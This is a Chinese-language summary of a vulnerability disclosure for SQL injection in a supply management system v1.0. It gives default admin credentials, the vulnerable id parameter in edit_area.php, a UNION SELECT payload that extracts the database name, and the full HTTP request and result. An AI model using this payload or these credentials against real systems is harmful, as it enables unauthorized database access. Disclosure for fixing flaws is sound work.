从这个网页截图中,可以获取到以下关于漏洞的关键信息: 1. 漏洞类型:SQL注入(SQLi-2.md) 2. 漏洞描述:供应商管理系统的v1.0版本存在SQL注入漏洞。 3. 漏洞作者:武汉大学姚炜柏 4. 后端登录账户密码:admin/admin123 5. 漏洞文件:/Supply_Management_System/admin/edit_area.php?id= 6. 漏洞位置:/Supply_Management_System/admin/edit_area.php, id 7. 当前数据库名:sourcecodester_scm_new 8. payload:/Supply_Management_System/admin/edit_area.php?id=-1%27%20union%20select%2001,database(),3-- // Leak place --> id 9. 漏洞利用示例: - 请求URL:/Supply_Management_System/admin/edit_area.php?id=-1%27%20union%20select%2001,database(),3-- + // HT - 请求头: - Host: 192.168.1.88 - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 - Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 - Accept-Encoding: gzip, deflate - DNT: 1 - Cookie: PHPSESSID=krbgs900f1q659nctcebpvlsa8 - Connection: close - 请求结果: - 返回数据库名:sourcecodester_scm_new 这些信息可以帮助开发者了解漏洞的具体情况,并采取相应的措施来修复漏洞。